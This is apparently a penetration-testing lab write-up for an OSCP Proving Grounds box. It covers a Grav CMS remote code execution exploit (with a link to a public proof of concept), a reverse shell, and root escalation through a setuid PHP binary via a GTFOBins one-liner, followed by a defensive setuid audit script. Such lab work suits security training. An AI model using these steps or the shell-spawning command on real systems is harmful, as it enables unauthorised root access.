OSCP Proving Grounds Helpdesk Writeup (Linux)
nmap --min-rate 3000 -p- 192.168.115.12 -Pn -sV -sC
We find only two ports open.
Seems to have a folder exposed to us.
It seems like some sort of CMS, though I have no idea what this is.
Let's see if we can find a version number and check whether there are any RCEs associated with "Grav".
While doing some research I came across the following article, which leads me to /admin.
Based on that article I was able to seemingly replicate the POC of the RCE.
As a reminder the admin nonce is a hidden field in the form.
So given a 200, I suppose this CMS is vulnerable.
After doing a little bit more research, I found a POC online: https://github.com/CsEnox/CVE-2021-21425/blob/main/exploit.py
After a little bit of fiddling around I ran the following command. For the Ub3r Lazy: https://www.revshells.com/
and...
We have a Shell!
After running linpeas we find a few interesting pieces of information.
I attempted to priv esc with cron jobs but no luck.
After more recon I discovered a password hash.
Spending many hours trying to crack this hash turned out to be pointless.
For some reason I circled back and decided to look for SUID binaries manually, because why not?
So here is my frustration:
ALWAYS CHECK SUID BINARIES MANUALLY.
ALWAYS.
ALWAYS.
ALWAYS.
IDC WHAT YOU SAY. MANUAL.
FML
Anyway here is a link to that:
We notice that /usr/bin/php7.4 stands out.
The binary lives in /usr/bin/.
And based on GTFOBins we can just run ./php -r "pcntl_exec('/bin/sh', ['-p']);"
I'm still kind of mad... Linpeas didn't pick it up.
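As an added example (not part of the original writeup or of any tool it mentions), here is the manual setuid check done as a small POSIX shell audit: it lists every setuid file under a root and flags those missing from a known-good allowlist, so a setuid interpreter such as php7.4 shows up at once. The allowlist and the constructed demo tree are assumptions, not taken from the box.

```shell
#!/bin/sh
# Added example: audit setuid binaries and flag anything not on a known-good
# allowlist. A setuid interpreter (php, perl, python...) lets any local user
# run arbitrary code as the file owner, so it belongs on every manual check.

# Assumed known-good setuid basenames on a typical Debian/Ubuntu install.
SUID_ALLOWLIST="su sudo passwd chsh chfn gpasswd newgrp mount umount fusermount pkexec"

# Print every regular file under $1 with the setuid bit set, one path per line.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Return 0 if basename $1 is on the allowlist, 1 otherwise.
is_allowed() {
    for allowed in $SUID_ALLOWLIST; do
        [ "$1" = "$allowed" ] && return 0
    done
    return 1
}

# Print the setuid files under $1 that are NOT on the allowlist.
unexpected_suid() {
    list_suid "$1" | while IFS= read -r path; do
        is_allowed "$(basename "$path")" || printf '%s\n' "$path"
    done
}

# Self-contained demo on a constructed directory tree (no real system files
# are touched). Prints the one unexpected setuid file: .../usr/bin/php7.4
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/usr/bin"
    : > "$tmp/usr/bin/passwd"; chmod 4755 "$tmp/usr/bin/passwd"  # expected setuid
    : > "$tmp/usr/bin/php7.4"; chmod 4755 "$tmp/usr/bin/php7.4"  # setuid interpreter
    : > "$tmp/usr/bin/ls";     chmod 0755 "$tmp/usr/bin/ls"      # no setuid bit
    unexpected_suid "$tmp"
    rm -rf "$tmp"
}
```

On a real host run `unexpected_suid /` as root and diff the output against the previous run; a new entry is a change worth explaining.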